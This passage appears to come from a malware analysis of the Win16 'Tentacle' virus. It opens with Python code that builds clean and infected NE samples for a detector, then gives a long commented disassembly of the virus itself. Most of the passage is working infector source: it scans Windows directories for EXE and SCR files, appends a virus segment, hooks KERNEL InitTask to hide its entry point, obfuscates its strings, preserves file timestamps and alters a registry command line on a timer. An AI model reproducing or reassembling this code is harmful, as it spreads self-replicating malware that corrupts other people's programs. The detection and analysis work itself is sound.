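KERNEL_INITTASK = struct.pack("<HH", 1, 0x5B)      # module-ref 1 = KERNEL, ordinal 5Bh


def clean_sample():
    return build_ne([(HOST_CODE, 0, [reloc(3, 1, 1, KERNEL_INITTASK)])], [b"KERNEL"])


def infected_sample():
    """The clean sample after infect_file: marker set, SHELL appended, virus segment
    appended, INITTASK fixup turned into an internal reference to virus_entry (2Eh)."""
    patched = reloc(3, 0, 1, struct.pack("<BBH", 2, 0, 0x2E))
    body = b"\x90" * VIRUS_SEG_SIZE                # stand-in for the virus body
    end = VIRUS_SEG_SIZE - 12                      # the three 0000:FFFF pointers end the body
    records = [reloc(3, 1, end, struct.pack("<HH", 2, 6)),       # SHELL.RegQueryValue
               reloc(3, 1, end + 4, struct.pack("<HH", 2, 5)),   # SHELL.RegSetValue
               reloc(3, 1, end + 8, KERNEL_INITTASK)]            # org_entry: hooked API
    return build_ne([(HOST_CODE, 0, [patched]), (body, VIRUS_SEG_FLAGS, records)],
                    [b"KERNEL", b"SHELL"], maxmem=INFECTION_MARKER)
```

Each indicator on its own is weak (a legitimate program may well keep an internal far-pointer fixup into its last segment), which is why the verdict requires all four together; on a real sample the segment size check is the one to relax first, since variants or a different relocation count change it.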
virus_size EQU (offset virus_end - offset virus_start)

.model tiny
.code
.386
org 0

virus_start:
segm_offset dw 0
segm_phys_size dw virus_size
segm_attribs dw 0001110101010000b ; 1D50h: moveable, preload, discardable
; code segment with relocation info
segm_virt_size dw virus_size

reloc_stuff:
dd 0000FFFFh ; pointers that will become relocated
dd 0000FFFFh ; must be initialised by 0000:FFFF
dd 0000FFFFh

; This is the real start of the relocation data:


dw 3 ; three relocation items

db 3 ; 32bit far pointer


db 1 ; imported ordinal
dw offset RegQueryValue ; offset of relocation item
size_of_reloc_stuff1 EQU ($ - reloc_stuff)
dw 0 ; will become module-reference index
reloc_stuff2 dw 6 ; ordinal RegQueryValue

db 3 ; 32bit far pointer


db 1 ; imported ordinal
dw offset RegSetValue ; offset of relocation item
size_of_reloc_stuff2 EQU ($ - reloc_stuff2)
dw 0 ; will become module-reference index
reloc_stuff3 dw 5 ; ordinal RegSetValue

db 3 ; 32bit far pointer


db 1 ; imported ordinal
dw offset org_entry; offset of relocation item
size_of_reloc_stuff3 EQU ($ - reloc_stuff3)
dw 0 ; will become module-reference index
dw 0 ; will become ordinal of hooked API

virus_entry:
push ds ; save DS
pusha ; save all registers

push ss ; DS=SS
pop ds

sub sp,size stack_frame ; reserve room on stack


mov bp,sp ; setup stack frame

mov ah,1Ah ; set DTA to DS:DX


lea dx,[bp.dta] ; DS:DX=our DTA in our stack frame
int 21h

mov bx,1
mov cx,offset empty_string
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in current dir
mov bx,2
mov cx,offset C_windows
mov dx,offset exe_wildcard
CALL infect_directory ; infect two EXE files in C:\WINDOWS

mov bx,1
mov cx,offset C_win
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN

mov bx,1
mov cx,offset C_win31
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN31

mov bx,1
mov cx,offset C_win311
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN311

mov bx,1
mov cx,offset C_win95
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN95

mov bx,1
mov cx,offset empty_string
mov dx,offset scr_wildcard
CALL infect_directory ; infect one SCR in current dir

mov ah,1Ah ; set DTA to DS:DX


mov dx,7Fh ; DX=80h (standard DTA offset)
inc dx
push ds ; save DS
push es ; DS=ES=PSP (or equivalent) segment
pop ds
int 21h

pop ds ; restore DS

mov ah,2Ch ; get the system time to CX/DX


int 21h ; CH=hours, CL=minutes, DH=seconds
; DL=1/100 seconds

cmp cx,100h ; is it before 1:00am ?


JB restore_host ; if yes, no payload
cmp cx,105h ; is it before 1:05am ?
JB change_gif_cmdline ; call payload between 1:00 and 1:05
cmp cx,10Fh ; is it before 1:15am ?
JB restore_host ; if yes, no payload
cmp cx,200h ; is it 2:00am or later ?
JAE restore_host ; if yes, no payload
mov ax,0 ; restore old gif commandline
JMP call_payload ; call payload between 1:15 and 2:00
change_gif_cmdline:
mov ax,1 ; change gif commandline to our file
call_payload:
CALL payload ; play with the gif commandline in
; the win16 "registry".

restore_host:
add sp,size stack_frame ; free room on stack

popa ; restore all registers


pop ds ; restore DS
JMP cs:org_entry ; jump to the API that was hooked
; for the EPO while infection.

C_win db "C:\WIN\", 0

; The following two subroutines are not used anywhere in the virus. I guess
; that they were only used for the first generation sample and accidentally
; left in by the virus author. That's why I also used them in the first
; generation carrier of the disassembly.

encrypt_wildcard:
push si ; save SI
push di ; save DI
push es ; save ES

push ds ; ES=DS
pop es

mov di,si ; DI=SI


xor al,al ; AL=0
mov cx,0FFFFh ; search whole segment
repne scasb ; search for the end of the string
dec di ; go back to the terminating zero
mov ax,di ; AX=end of string
; SI=start of string
sub ax,si ; AX=length of string

pop es ; restore ES
pop di ; restore DI

mov cx,ax ; CX=length of string

encrypt_wildcard_loop:
inc byte ptr [si] ; encrypt one byte from string
inc si ; next byte
loop encrypt_wildcard_loop

pop si ; restore SI

RET

encrypt_path:
push si ; save SI
push di ; save DI
push es ; save ES

push ds ; ES=DS
pop es

mov di,si ; DI=SI


xor al,al ; AL=0
mov cx,0FFFFh ; search whole segment
repne scasb ; search for the end of the string
dec di ; go back to the terminating zero
mov ax,di ; AX=end of string
; SI=start of string
sub ax,si ; AX=length of string

pop es ; restore ES
pop di ; restore DI

mov cx,ax ; CX=length of string

encrypt_path_loop:
dec byte ptr [si] ; encrypt one byte from string
inc si ; next byte
loop encrypt_path_loop

pop SI ; restore SI

RET

; ----- DECRYPT PATH STRING -------------------------------------------------


; Entry:
; SI - pointer to source buffer
; DI - pointer to destination buffer
; Exit:
; DI - end of destination buffer

decrypt_path:
cld ; clear direction flag

push di ; save DI
push es ; save ES

push ds ; ES=DS
pop es

mov di,si ; DI=SI


xor al,al ; AL=0
mov cx,0FFFFh ; search whole segment
repne scasb ; search for the end of the string
dec di ; go back to the terminating zero
mov ax,di ; AX=end of string
; SI=start of string
sub ax,si ; AX=length of string

pop es ; restore ES
pop di ; restore DI

mov cx,ax ; CX=length of string


inc cx ; because the LOOP immediately follows
JMP loop_decrypt_path

decrypt_path_loop:
lodsb ; load a byte from source string
inc al ; decrypt it
stosb ; store decrypted byte
loop_decrypt_path:
loop decrypt_path_loop

movsb ; move terminating zero


RET

; ----- DECRYPT WILDCARD STRING ---------------------------------------------


; Entry:
; SI - pointer to source buffer
; DI - pointer to destination buffer
; Exit:
; DI - end of destination buffer

decrypt_wildcard:
cld ; clear direction flag

push di ; save DI
push es ; save ES

push ds ; ES=DS
pop es

mov di,si ; DI=SI


xor al,al ; AL=0
mov cx,0FFFFh ; search whole segment
repne scasb ; search for the end of the string
dec di ; go back to the terminating zero
mov ax,di ; AX=end of string
; SI=start of string
sub ax,si ; AX=length of string

pop es ; restore ES
pop di ; restore DI

mov cx,ax ; CX=length of string


inc cx ; because the LOOP immediately follows
JMP loop_decrypt_wildcard

decrypt_wildcard_loop:
lodsb ; load a byte from source string
dec al ; decrypt it
stosb ; store decrypted byte
loop_decrypt_wildcard:
loop decrypt_wildcard_loop

movsb ; move terminating zero


RET

C_windows db "C:\WINDOWS\"
empty_string db 0

; ----- INFECT A DIRECTORY --------------------------------------------------


;
; INPUT:
; BX - number of files to infect
; CX - ptr to path to infect (encrypted)
; DX - ptr to file wildcard ("*.EXE" or "*.SCR", also encrypted)

infect_directory:
push ds ; save DS
push es ; save ES

push cs ; DS=CS
pop ds

push ss ; ES=SS
pop es

mov si,cx ; SI=ptr to path to decrypt


lea di,[bp.full_filespec] ; DI=ptr to where full wildcard will
; be stored ("C:\path\*.ext")
push cx ; save CX (pointer to path)
CALL decrypt_path ; decrypt the path to full_filespec

dec di ; skip the terminating zero

mov si,dx
CALL decrypt_wildcard ; decrypt the wildcard to full_filespec

pop si ; restore ptr to path in SI


lea di,[bp.full_filename]
CALL decrypt_path
dec di ; skip the terminating zero

pop es ; restore ES
pop ds ; restore DS

mov ah,4Eh ; find first file


mov cx,2 ; normal and hidden files
lea dx,[bp.full_filespec]
JMP do_file_search

do_file:
push es ; save ES
push di ; save DI

push ss ; ES=SS
pop es

cld ; clear direction flag


lea si,[bp.dta+1Eh] ; SI=ptr to found filename in DTA
; DI points after the path in
; full_filename
mov cx,13 ; 8.3 filename (zero terminated)
rep movsb ; copy filename

pop di ; restore DI
pop es ; restore ES

test byte ptr [bp.dta+15h],1 ; read only attribute set?


JZ not_readonly

push dx ; save DX

mov ax,3000h ; AX=4301h (set file attributes)


add ax,1301h
xor ch,ch ; set high byte of attributes to zero
mov cl,[bp.dta+15h] ; CL=low byte of attributes
;* and cx,0FFFEh ; delete read-only attribute
db 83h,0E1h,0FEh ; fixup - byte match
lea dx,[bp.full_filename] ; DS:DX=ptr to filename (with path)
int 21h

pop dx ; restore DX

JC findnext ; error? if so, search on

not_readonly:
CALL infect_file ; infect the file!
JC findnext ; on error while infecting search on!
dec bx ; decrement infection counter
JZ done_directory ; enough files infected?
findnext:
mov ah,4Fh ; find next file

do_file_search:
int 21h ; do the file search
JNC do_file ; if no error happened, process file

done_directory:
RET

C_win31 db "C:\WIN31\", 0

exe_wildcard db "*.EXE", 0
scr_wildcard db "*.SCR", 0

; ----- INFECT THE FILE -----------------------------------------------------

infect_file:
pushad ; save all 32bit registers

mov ax,3D00h ; open file read-only


lea dx,[bp.full_filename] ; DS:DX=pointer to filename
int 21h
JC exit_infect ; exit on error
mov bx,ax ; file handle to BX
mov [bp.source_handle],ax ; save file handle

CALL get_file_date_time_size

mov ah,3Fh ; read DOS header


mov cx,64 ; DOS header size
lea dx,[bp.rw_buffer] ; Load effective addr
int 21h
JC close_file

mov ax,word ptr [bp.rw_buffer] ; AX=exe marker


dec ax ; anti-heuristic
cmp ax,"ZM"-1 ; EXE file?
JNE close_file ; close if not

;* cmp word ptr [bp.rw_buffer+0Ch],0FFFEh ; maxmem item in DOS


; header is infection marker
db 81h,0BEh,0A9h,0,0FEh,0FFh ; fixup - byte match
JE close_file ; if equal, file is already infected

;* cmp word ptr [bp.rw_buffer+0Ch],0FFFFh ; maxmem must be standard


db 81h,0BEh,0A9h,0,0FFh,0FFh ; fixup - byte match
JNE close_file ; if not, don't infect

mov word ptr [bp.rw_buffer+0Ch],0FFFEh ; mark as infected


cmp word ptr [bp.rw_buffer+18h],40h ; new exe file?
JB close_file ; if not, then close

; set tmp_filename to "C:\TENTACLE.$$$", 0


mov dword ptr [bp.tmp_filename+6],0F59E6305h
add dword ptr [bp.tmp_filename+6],56A4DE4Fh
mov word ptr [bp.tmp_filename+0],":C"
mov dword ptr [bp.tmp_filename+10],"$$.E"
mov dword ptr [bp.tmp_filename+2],0B1704BC2h
add dword ptr [bp.tmp_filename+2],9CD5089Ah
mov word ptr [bp.tmp_filename+14],"$"
mov ah,3Ch ; create temporary file
mov cx,2 ; with hidden attributes
lea dx,[bp.tmp_filename] ; DS:DX=ptr to filename
int 21h
JC close_file ; exit on error
mov [bp.dest_handle],ax ; save temp file handle

mov ah,40h ; write DOS header of temp file


mov bx,[bp.dest_handle] ; BX=file handle
mov cx,64 ; CX=length to write
lea dx,[bp.rw_buffer] ; DS:DX=address write buffer
int 21h
JC close_tmp_file

mov ecx,dword ptr [bp.rw_buffer+3Ch] ; ECX=new exe header offset


mov [bp.new_header_offs],ecx; store it
sub ecx,64 ; size of dos header (already written)
CALL copy_file_block ; copy rest of DOS stub
JC close_tmp_file

mov bx,[bp.source_handle] ; BX=handle of victim file


mov ah,3Fh ; read NE header
mov cx,64 ; size of NE header
lea dx,[bp.rw_buffer] ; DX=offset of buffer
int 21h
JC close_tmp_file

mov ax,word ptr [bp.rw_buffer] ; AX=new exe marker


inc ax ; anti-heuristic
cmp ax,"EN"+1 ; NE exe file?
JNE close_tmp_file ; if not, then abort infection

mov cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift


mov eax,1 ; EAX=1
shl eax,cl ; EAX=alignment unit
mov [bp.alignment_unit],eax ; save it
mov cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift
mov eax,[bp.file_size] ; EAX=filesize
shr eax,cl ; EAX=filesize in alignment units
mov [bp.new_sect_descr+0],ax ; save it as offset for the new
; segment that is going to be created
mov eax,[bp.alignment_unit] ; EAX=alignment unit
dec eax ; set all bits below alignment
test eax,[bp.file_size] ; filesize already aligned?
JZ filesize_already_aligned
inc word ptr [bp.new_sect_descr+0] ; if not, round it up
filesize_already_aligned:
mov ax,cs:segm_phys_size ; copy physical size of segment
mov [bp.new_sect_descr+2],ax
mov ax,cs:segm_attribs ; copy segment attributes
mov [bp.new_sect_descr+4],ax
mov ax,cs:segm_virt_size ; copy virtual size of segment
mov [bp.new_sect_descr+6],ax

cmp word ptr [bp.rw_buffer+22h],40h ;is the segment table directly


; after the NE header (standard case)?
JNE close_tmp_file ; if not, better not infect the file

CALL EPO
JC close_tmp_file
mov [bp.module_ordinal],eax ; save module index and ordinal
mov [bp.our_reloc_offs],edx ; save offset of relocation item
xor eax,eax ; EAX=0
mov ax,word ptr [bp.rw_buffer+22h] ; EAX=offset of segment
; descriptor table from NE hdr
add eax,[bp.new_header_offs]; EAX=offset of segment descriptor
; table from file start

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; go to segment descriptor table
int 21h

mov ah,3Fh ; read the offset of the first segment


mov cx,2 ; read a word
lea dx,[bp.first_segm_offs] ; DX=offset read buffer
int 21h
JC close_tmp_file

mov ax,4201h ; move file pointer relative to


; current position
mov cx,-1 ; CX:DX=-2 (new filepointer position)
mov dx,-2
int 21h ; set the filepointer back to the
; start of the segment table
JC close_tmp_file

xor eax,eax ; EAX=0


mov ax,word ptr [bp.first_segm_offs] ; EAX=aligned file offset
; of first segment
mul [bp.alignment_unit] ; EAX=file offset of the 1st segment
mov [bp.first_segm_offs],eax; save it

mov ebx,dword ptr [bp.rw_buffer+2Ch]


; EBX=beginning of the nonresident-name table (relative to filestart).
; This should be the last table in the NE header.

xor ecx,ecx ; ECX=0


mov cx,word ptr [bp.rw_buffer+20h] ; ECX=size of nonresident name
; table in bytes
add ebx,ecx ; EBX=size of NE header + all tables
mov dword ptr [bp.end_of_NE_hdr],ebx

sub eax,ebx ; EAX=free room between the end of


; the NE header and the first segment

;* cmp eax,10h ; is there enough room left so we can


; add our stuff (a segment descriptor,
; a module reference and an imported
; name) ?
db 66h,83h,0F8h,10h ; fixup - byte match
JL close_tmp_file ; if not, we can't infect the file

mov ax,word ptr [bp.rw_buffer+1Ch] ; segment count


inc ax ; add another segment
mov word ptr [bp.rw_buffer+1Ch],ax ; save new segment count
mov word ptr [bp.new_entry_CS],ax ; new entry segment index
mov word ptr [bp.new_entry_IP],offset virus_entry ; set new
; entry IP
and byte ptr [bp.rw_buffer+37h],011110111b ; windows flags:
; kill gangload area

; fixup the offsets of the other NE header tables (all are after the segment
; table and therefore shifted back). It is assumed that all tables are in the
; same order in the file as their offsets are stored in the NE header (except
; for the entry table, which should be the second last).

add word ptr [bp.rw_buffer+4h],16 ; entry table


add word ptr [bp.rw_buffer+24h],8 ; resource table
add word ptr [bp.rw_buffer+26h],8 ; resident-name table
add word ptr [bp.rw_buffer+28h],8 ; module-reference table
add word ptr [bp.rw_buffer+2Ah],10 ; imported-name table
add dword ptr [bp.rw_buffer+2Ch],16 ; nonresident-name table

inc word ptr [bp.rw_buffer+1Eh] ; one more entry in


; module-reference table

mov ah,40h ; write modified NE header to tmp file


mov bx,[bp.dest_handle] ; BX=temp file handle
mov cx,64 ; NE header size
lea dx,[bp.rw_buffer] ; DX=write buffer offset
int 21h
JC close_tmp_file

xor ecx,ecx ; ECX=0


mov cx,word ptr [bp.rw_buffer+1Ch] ; ECX=number of segments
dec cx ; ECX=old number of segments
shl cx,3 ; shl 3 means mul 8 (size of a
; segment descriptor)
; ECX=old size of segm descriptor tbl
CALL copy_file_block ; copy segment descriptor table
JC close_tmp_file

mov ah,40h ; write our own segment descriptor


; to the file
mov cx,8 ; size of a segment descriptor
lea dx,[bp.new_sect_descr] ; DX=offset of write buffer
int 21h
JC close_tmp_file

xor ecx,ecx ; ECX=0


mov cx,word ptr [bp.rw_buffer+2Ah] ; ECX=offset of imported-name
; table from NE header
mov ax,word ptr [bp.rw_buffer+1Ch] ; entries in segment table
dec ax ; AX=old number of segments
shl ax,3 ; multiply with 8 (size of a
; segment descriptor)
add ax,word ptr [bp.rw_buffer+22h] ; add offset of segment table
; (from NE header)
; AX=offset end of segment table
; relative to the NE header
sub cx,ax ; CX=length of stuff between the
; segment table and the imported-name
; table (resource, resident-name and
; module-reference tables)
sub cx,10 ; because the imported-name table
; offset has already been increased
; by 10 before
CALL copy_file_block ; copy all those tables
JC close_tmp_file

mov ax,word ptr [bp.rw_buffer+4] ; offset entry table (from


; NE header)
sub ax,6 ; AX=end of old imported-name table

sub ax,word ptr [bp.rw_buffer+2Ah] ; subtract offset of imported-name


; table from NE header
mov word ptr [bp.tmp_buffer],ax ; AX=offset into imported-name
; table (the one of the module
; name we're going to add)

mov ah,40h ; append our new entry into the


; module reference table, the offset
; of the new module name
mov cx,2 ; write one word
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

xor ecx,ecx ; ECX=0


mov cx,word ptr [bp.rw_buffer+4] ; offset entry table (from
; NE header)
sub cx,6 ; CX=end of old imported-name table
sub cx,word ptr [bp.rw_buffer+2Ah] ; offset of imported-names
; table from NE header
CALL copy_file_block ; copy imported-name table
JC close_tmp_file

mov ah,40h ; append our module name to the


; imported-name table
mov cx,6 ; length to write
mov word ptr [bp.tmp_buffer+4],"LL" ; create the string
mov dword ptr [bp.tmp_buffer],6DBBFE87h ; 5, "SHELL"
add dword ptr [bp.tmp_buffer],0D78C547Eh ; in tmp_buffer
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

mov cx,word ptr [bp.end_of_NE_hdr] ; end of NE header+all tables


; (offset from filestart
sub cx,word ptr [bp.rw_buffer+4] ; offset entry table (from
; NE header)
add cx,word ptr [bp.new_header_offs]; BUG! this should be a sub,
; not an add! But because the
; filepointer is set anew
; immediately afterwards, this
; never causes any problems.
CALL copy_file_block ; copy the rest of the header
; (entry and nonresident-name tables)
JC close_tmp_file

mov ax,4200h ; set filepointer in the destination


; (temp) file to the start of the
; first segment.
push dword ptr [bp.first_segm_offs]
pop dx ; CX:DX=first segment offset
pop cx
int 21h
JC close_tmp_file

mov ax,4200h ; set filepointer in the source file


; to the start of the first segment
mov bx,[bp.source_handle]
push dword ptr [bp.first_segm_offs]
pop dx ; CX:DX=first segment offset
pop cx
int 21h
JC close_tmp_file
mov ecx,0FFFFFFFFh ; whole file body
CALL copy_file_block ; copy the file body (all segments
; and relocations)
JC close_tmp_file

xor eax,eax ; EAX=0


mov ax,[bp.new_sect_descr+0]; EAX=aligned offset of our segment
mov cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift
shl eax,cl ; EAX=offset of our segment in bytes

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; go to our segment offset in file
mov bx,[bp.dest_handle] ; BX=temp file handle
int 21h
JC close_tmp_file

mov ah,40h ; write virus body to file


mov cx,(RegQueryValue-virus_start) ; write whole virus body
; excluding the three pointers that
; must be relocated and therefore
; initialised with 0000:FFFF
mov dx,offset virus_start ; DX=offset write buffer=virus body
push ds ; save DS
push cs ; DS=CS
pop ds
int 21h

pop ds ; restore DS
JC close_tmp_file

mov ah,40h ; write relocation stuff


mov cx,size_of_reloc_stuff1 ; size of relocation stuff
mov dx,offset reloc_stuff ; DX=offset write buffer
push ds ; save DS
push cs ; DS=CS
pop ds
int 21h

pop ds ; restore DS
JC close_tmp_file

mov ah,40h ; write module index


mov cx,2 ; one word
lea dx,ss:[bp.rw_buffer+1Eh]; number of entries in module
; reference table - our module
; reference is the last
int 21h
JC close_tmp_file

mov ah,40h ; write relocation stuff


mov cx,size_of_reloc_stuff2 ; size of relocation stuff
mov dx,offset reloc_stuff2 ; DX=offset write buffer
push ds ; save DS
push cs ; DS=CS
pop ds
int 21h

pop ds ; restore DS
JC close_tmp_file

mov ah,40h ; write module index


mov cx,2 ; one word
lea dx,ss:[bp.rw_buffer+1Eh]; number of entries in module
; reference table - our module
; reference is the last
int 21h
JC close_tmp_file

mov ah,40h ; write relocation stuff


mov cx,size_of_reloc_stuff3 ; size of relocation stuff
mov dx,offset reloc_stuff3 ; DX=offset write buffer
push ds ; save DS
push cs ; DS=CS
pop ds
int 21h

pop ds
JC close_tmp_file

mov ah,40h ; write the reference to the API


; we hooked for the EPO
mov cx,2 ; CX=4 (size to write)
shl cx,1 ; ???
lea dx,[bp.module_ordinal] ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

push [bp.our_reloc_offs] ; CX:DX=offset of the relocation item


pop dx ; that has to be modified
pop cx
mov ax,4200h ; set filepointer relative to
int 21h ; filestart
JC close_tmp_file

mov ah,40h ; write relocation type


mov cx,2 ; one word
mov word ptr [bp.tmp_buffer],3 ; 32bit far ptr/internal reference
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

mov ax,4201h ; set new file pointer relative to


; current position
mov cx,0 ; CX:DX=2 (skip the offset of the
mov dx,2 ; dword that must be relocated)
int 21h
JC close_tmp_file

mov ah,40h ; write a far pointer to the virus


; entrypoint.
mov cx,2 ; CX=4 (size to write)
shl cx,1 ; ???
lea dx,[bp.new_entry_CS] ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

cmp dword ptr [bp.dta+24h],"XE.P" ; check the filename of the


JNE not_winhelp ; victim for "WINHELP.EXE" and try to
mov eax,dword ptr [bp.dta+20h] ; patch it if the filename matches
add eax,98F5548Ah
cmp eax,"LEHN"+98F5548Ah
JNE not_winhelp
cmp word ptr [bp.dta+28h],"E"
JNE not_winhelp
cmp word ptr [bp.dta+1Eh],"IW"
JNE not_winhelp
CALL patch_winhelp
not_winhelp:

mov ah,3Eh ; close temp file


int 21h

mov bx,[bp.source_handle] ; BX=victim file handle


mov ah,3Eh ; close victim file
int 21h

lea dx,[bp.tmp_filename] ; DS:DX=pointer to temp file name


mov ax,3D00h ; reopen temp file read-only
int 21h

JC delete_tmp_file
mov [bp.source_handle],ax ; save handle

mov ah,3Ch ; truncate victim file


mov cx,0 ; no attributes
lea dx,[bp.full_filename] ; DS:DX=ptr to full victim filename
int 21h
JC delete_tmp_file

mov bx,ax ; handle to BX


mov [bp.dest_handle],ax ; save handle

mov ecx,0FFFFFFFFh ; copy the whole temp file over the


CALL copy_file_block ; victim file

mov ax,3000h ; AX=5701h - set file date and time


add ax,2701h
mov bx,[bp.dest_handle] ; BX=handle of victim file
mov dx,[bp.file_date] ; DX=old file date
mov cx,[bp.file_time] ; CX=old file time
int 21h

mov ah,3Eh ; close victim file


int 21h

mov bx,[bp.source_handle] ; BX=handle of temp file


mov ah,3Eh ; close temp file
int 21h

lea dx,[bp.tmp_filename] ; DS:DX=pointer to temp file name


mov ah,41h ; delete temp file
int 21h

clc ; clear carry flag (indicate success)


JMP exit_infect

close_tmp_file:
mov bx,[bp.dest_handle] ; BX=handle of temp file
mov ah,3Eh ; close temp file
int 21h

delete_tmp_file:
lea dx,[bp.tmp_filename] ; DS:DX=pointer to temp file name
mov ah,41h ; delete temp file
int 21h

close_file:
mov bx,[bp.source_handle] ; BX=handle of victim file
mov ah,3Eh ; close victim file
int 21h

stc ; set carry flag (indicate error)

exit_infect:
popad ; restore all 32bit registers
RET

C_win311 db "C:\WIN311\", 0

; ----- GET DATE, TIME AND SIZE OF THE OPENED FILE --------------------------

get_file_date_time_size:
push cx ; save CX and DX
push dx

mov ax,5700h ; get date and time


int 21h

mov [bp.file_date],dx ; save date


mov [bp.file_time],cx ; save time

xor cx,cx ; CX:DX=0 (distance to move)


xor dx,dx
mov ax,4202h ; move filepointer relative to
int 21h ; end of file
; in DX:AX the new filepointer is
; returned (filesize in this case)

mov word ptr [bp.file_size+2],dx ; save filesize


mov word ptr [bp.file_size],ax

xor cx,cx ; CX:DX=0 (distance to move)


xor dx,dx
mov ax,4200h ; move filepointer relative to
int 21h ; beginning of file

pop dx ; restore DX and CX


pop cx

RET

C_win95 db "C:\WIN95\", 0

; ----- COPY ECX BYTES FROM VICTIM FILE TO TEMP FILE ------------------------

copy_file_block:
pushad ; save all 32bit registers
sub sp,256 ; allocate a 256 byte buffer from stack
mov [bp.bytes_to_copy],ecx ; save length of block to copy
mov dx,sp ; DX=offset buffer

copy_file_block_loop:
cmp [bp.bytes_to_copy],0 ; whole block moved?
JE copy_file_block_done ; then we're done
cmp [bp.bytes_to_copy],256 ; more than 256 bytes left?
JBE copy_remaining_bytes_block
mov cx,256 ; then just copy 256 bytes
JMP read_file_block

copy_remaining_bytes_block:
mov cx,word ptr [bp.bytes_to_copy] ; copy all bytes left

read_file_block:
push cx ; save size to read/write
mov bx,[bp.source_handle] ; BX=handle of source file
mov ah,3Fh ; read from file function
push ds ; save DS
push ss ; DS=SS
pop ds
int 21h

pop ds ; restore DS
mov bx,[bp.dest_handle] ; BX=handle of destination file
mov cx,ax ; write as many bytes as were read
mov ah,40h ; write block to temporary file
push ds ; save DS
push ss ; DS=SS
pop ds
int 21h

pop ds ; restore DS
cmp cx,ax ; sizes of read block=written block ?
pop cx ; restore size to read and write
JNZ copy_file_block_error ; if not equal, then an error occurred
cmp cx,ax ; size of read/written block equal
; to the size we planned to read?
JNE copy_file_block_done ; if not, we're at the end of the file

cwde ; convert word to dword (AX->EAX)


sub [bp.bytes_to_copy],eax ; we've copied EAX bytes more
JMP copy_file_block_loop ; copy next file block

copy_file_block_error:
stc ; set carry flag (indicate error)
JMP copy_file_block_ret ; NOTE: this path skips the add sp,256
; and popad below, so the RET pops a
; wrong return address. Left as is;
; only reached when fewer bytes were
; written than read (e.g. disk full).

copy_file_block_done:
clc ; clear carry flag (indicate success)
add sp,256 ; remove buffer from stack
popad ; restore all 32bit registers

copy_file_block_ret:
RET

; ----- SEARCH MODULE NAME --------------------------------------------------


;
; searches the module name pointed to by DX in the imported names table and
; returns in AX its number, otherwise indicates error with carry flag set

search_module_name:
push bx ; save BX
push es ; save ES

sub sp,256 ; reserve a 256 bytes buffer on stack


mov di,dx

push ss ; ES=SS
pop es

xor eax,eax ; EAX=0


mov ax,word ptr [bp.rw_buffer+28h] ; ptr to module-reference
; table (from NE header)
add eax,[bp.new_header_offs]; EAX=ptr to module-reference table
; (from file start)

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; set file pointer relative to
; file start to module reference table
int 21h
JC module_name_not_found

mov ah,3Fh ; read module reference table


mov cx,word ptr [bp.rw_buffer+1Eh] ; number of entries in
; module reference table
shl cx,1 ; multiply with two (each entry
; in module reference table is a word)
mov dx,sp ; DS:DX=ptr to our buffer on stack
int 21h
JC module_name_not_found

xor eax,eax ; EAX=0


mov ax,word ptr [bp.rw_buffer+2Ah] ; ptr to imported-names table
; (relative to NE header)
add eax,[bp.new_header_offs]; EAX=ptr to imported-names table
; relative to file start

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; set file pointer relative to
; file start to imported-names table
int 21h
JC module_name_not_found

mov ah,3Fh ; read imported-names table


mov cx,128 ; read 128 bytes
mov dx,sp ; DS:DX=ptr to buffer on stack
add dx,128 ; assume module-reference table is
; not longer than 128 bytes too
int 21h
JC module_name_not_found

mov bx,sp ; BX=module-reference table buffer


xor cx,cx ; CX=0
JMP check_if_all_modules_done

search_module_name_loop:
mov si,sp ; SI=buffer on stack
add si,128 ; SI=imported-names table buffer
add si,[bx] ; add offset from module-reference
; table to get a actual entry in the
; imported-names table

push cx ; save CX (module counter)


push di ; save DI (offset of module name
; to search for)

xor ch,ch ; CH=0


mov cl,[si] ; length of this entry in the
; imported-names table

inc cl ; also compare the string-length byte


cld ; clear direction flag
repe cmpsb ; compare the strings

pop di ; restore DI (offset of module name


; to search for)
pop cx ; restore CX (module counter)

JZ found_module_name
inc cx ; increment CX (module counter)
add bx,2 ; go to next entry in module-
; reference table
check_if_all_modules_done:
cmp cx,word ptr [bp.rw_buffer+1Eh] ; done all modules ?
JNE search_module_name_loop ; if not, search on
JMP module_name_not_found ; if yes, the search failed

found_module_name:
mov ax,cx ; AX=module counter
inc ax ; make counter start from 1
add sp,256 ; remove buffer from stack
clc ; clear carry flag (indicate success)
JMP exit_search_module_name

module_name_not_found:
add sp,256 ; remove buffer from stack
stc ; Set carry flag

exit_search_module_name:
pop es ; restore ES
pop bx ; restore BX
RET

; ----- EPO ENGINE ----------------------------------------------------------


;
; Entry: none
;
; Exit:
; EAX - module index (in LSW) and API ordinal (in MSW) of found reloc item,
; i.e. the same layout as the target dword of an imported-ordinal reloc
; EDX - file offset of relocation item to modify

EPO:

; create the string 6, "KERNEL" in tmp_buffer

mov dword ptr [bp.tmp_buffer+4],5AD5762Dh


mov dword ptr [bp.tmp_buffer+0],0F220B44Bh
add dword ptr [bp.tmp_buffer+0],602496BBh
add dword ptr [bp.tmp_buffer+4],0A576CF21h
lea dx,[bp.tmp_buffer] ; DX=pointer to 6, "KERNEL"
CALL search_module_name
JC check_VBrun
mov dx,5Bh ; ordinal of InitTask API
JMP search_API_reference

check_VBrun:
; create the string 8, "VBRUN300" in tmp_buffer
mov dword ptr [bp.tmp_buffer+4],9062F740h
mov dword ptr [bp.tmp_buffer+0],0EDC4FE68h
mov byte ptr [bp.tmp_buffer+8],"0"
add dword ptr [bp.tmp_buffer+4],9FD05715h
